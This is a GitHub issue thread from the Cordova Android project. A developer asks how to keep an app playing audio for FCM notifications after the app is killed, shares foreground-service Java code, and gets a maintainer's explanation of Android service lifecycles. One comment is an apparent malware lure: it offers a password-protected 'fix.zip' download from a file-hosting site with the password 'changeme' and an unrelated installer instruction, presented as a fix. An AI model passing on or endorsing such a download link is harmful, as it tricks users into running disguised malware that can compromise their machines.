### ISSUE TITLE
how to run cordova app if app is killed or closed

### ISSUE THREAD

**Issue by gopinath-yd** [apache/cordova-android#1733]
Hi i'm trying to keep active my app to read my fcm notification using tts and to play media once fcm notification received if app is killed or closed or terminated, i tried so many methods it doesn't work for me so please help me to fix this issue and i attached my code 

### Myforegroundservice
package com.fcm.test;

import android.app.Notification;
import android.app.Service;
import android.content.Intent;
import android.media.MediaPlayer;
import android.net.Uri;
import android.os.IBinder;
import androidx.core.app.NotificationCompat;

public class MyForegroundService extends Service {
    private MediaPlayer mediaPlayer;
    private static final String CHANNEL_ID = "ForegroundServiceChannel";

    @Override
    public int onStartCommand(Intent intent, int flags, int startId) {
        // Set up the notification for the foreground service
        Notification notification = new NotificationCompat.Builder(this, CHANNEL_ID)
            .setContentTitle("Playing Audio")
            .setContentText("Audio is playing in the background")
            .setSmallIcon(R.drawable.ic_music_note)  // Replace with your own icon
            .build();

        startForeground(1, notification);

        // Play the audio file
        String filePath = "android.resource://" + getPackageName() + "/raw/sample";
        mediaPlayer = MediaPlayer.create(this, Uri.parse(filePath));
        mediaPlayer.start();

        return START_NOT_STICKY;
    }

    @Override
    public void onDestroy() {
        super.onDestroy();
        if (mediaPlayer != null) {
            mediaPlayer.stop();
            mediaPlayer.release();
        }
    }

    @Override
    public IBinder onBind(Intent intent) {
        return null;
    }
}

### MyFirebaseMessagingService
package com.fcm.test;

import android.content.Context;
import android.content.Intent;
import androidx.core.content.ContextCompat;

import com.google.firebase.messaging.FirebaseMessagingService;
import com.google.firebase.messaging.RemoteMessage;

public class MyFirebaseMessagingService extends FirebaseMessagingService {
    @Override
    public void onMessageReceived(RemoteMessage remoteMessage) {
        if (remoteMessage.getData().containsKey("status") && "1".equals(remoteMessage.getData().get("status"))) {
            // Start foreground service to play audio
            Intent serviceIntent = new Intent(this, MyForegroundService.class);
            ContextCompat.startForegroundService(this, serviceIntent);
        }
    }
}

### Version information

I'm using cordova android 13.0.0

and is there anyother way to keep active like headless

i'm using the following plugins 
cordova-plugin-background-mode 0.7.3 "BackgroundMode"
cordova-plugin-device 3.0.0 "Device"
cordova-plugin-file 8.1.0 "File"
cordova-plugin-firebasex 16.5.0 "Google Firebase Plugin"
cordova-plugin-foreground-service 1.1.3 "Cordova Foreground Service"
cordova-plugin-media 7.0.0 "Media"

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by breautek** [comment]
> Hi i'm trying to keep active my app to read my fcm notification using tts and to play media once fcm notification received if app is killed or closed or terminated, i tried so many methods it doesn't work for me so please help me to fix this issue and i attached my code
...
and is there anyother way to keep active like headless

Android does not make any guarantee under any circumstance to keep your activity alive, especially once it goes into the background. If you need code running in the background the native way is to create background services, as services are are detached from the activity and can live beyond an activity's lifecycle.

For context for those who are unfamiliar with android naive terms, an `activity` is the "frontend"/UI object that the user can see and interact with. a `ForegroundService` is a background service in which has UI but in a form of a notification entry, therefore you're very limited to what can actually be displayed.

Cordova runs entirely in an activity where it manages a webview. When app's activity is destroyed, so is cordova and all of it's plugins and by extension, the entire webview environment.

To do what you want, you need to write a lot of native code to setup and launching native services where your business logic is within these services. This "setup" code can be exposed via the cordova plugin so that it runs (or you command it to run in your app) so that the service is launched when the activity/webview runs, but you'll need to add your app's business logic in these plugins on the native side so that they run **in** the service instead of the android activity. Because you're using media playback, a `ForegroundService` is necessary I believe. If you want it to interact with FCM the service code itself will probably need to interface with FCM, but I'm not familiar with FCM enough to give any specific suggestions.

I'm closing this issue because it doesn't detail a bug with Cordova. If you have any more questions, please use [GitHub Discussions](https://github.com/apache/cordova/discussions).
